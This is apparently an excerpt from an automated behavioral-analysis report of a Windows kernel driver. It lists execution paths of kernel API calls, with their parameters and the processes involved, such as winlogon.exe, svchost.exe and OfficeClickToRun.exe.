| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296d68, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7c159e0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7c159e0, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002d296a48, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #25 (length: 12, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #31 (length: 23, count: 6, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 23 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
| Process 25 (winlogon.exe, PID: 508) | 4 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x6cc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x6cc, Process_unk_out = 0xffffd00032ab6540, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003f9fb180, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd00032ab64f8, Handle_out = 0xffffffff80000fe8, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000fe8, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab64f0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a76faa0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000fe8, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0xd8, ProcessInformation_ptr_out = 0xffffe0003a76faa0, ReturnLength_ptr_out = 0xffffd00032ab64f0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000fe8, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003f9fb180, ret_val_ptr_out = 0x3ffb4 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76962c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8750 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c439c20, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd00032ab6340, ret_val_unk_out = 0xffffe0003c84acf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8750, MemoryDescriptorList_unk_out = 0xffffe0003c1f8750 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c439c20, Irp_unk = 0xffffe0003c84acf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c84acf0, Irp_unk_out = 0xffffe0003c84acf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8750 |
Execution Path #147 (length: 83, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 83 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c7, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a785700 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000fe8, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00032ab6c18, Object_out = 0xffffe0003b726600, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003b726600, ret_val_ptr_out = 0x7fff |
| PsGetCurrentProcessId | ret_val_unk_out = 0x6cc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a782010 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x6cc, Process_unk_out = 0xffffd00032ab6540, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003f9fb180, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd00032ab64f8, Handle_out = 0xffffffff80000b84, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000b84, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab64f0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a76faa0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000b84, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0xd8, ProcessInformation_ptr_out = 0xffffe0003a76faa0, ReturnLength_ptr_out = 0xffffd00032ab64f0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000b84, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003f9fb180, ret_val_ptr_out = 0x3ffb8 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a78218c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c439c20, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd00032ab6340, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c439c20, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a782464, SpinLock_unk_out = 0xffffe0003a782464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a782464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a782464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a782464, SpinLock_unk_out = 0xffffe0003a782464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a782464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a782464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a782464, SpinLock_unk_out = 0xffffe0003a782464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a782464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a782464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a782464, SpinLock_unk_out = 0xffffe0003a782464, ret_val_unk_out = 0x2 |
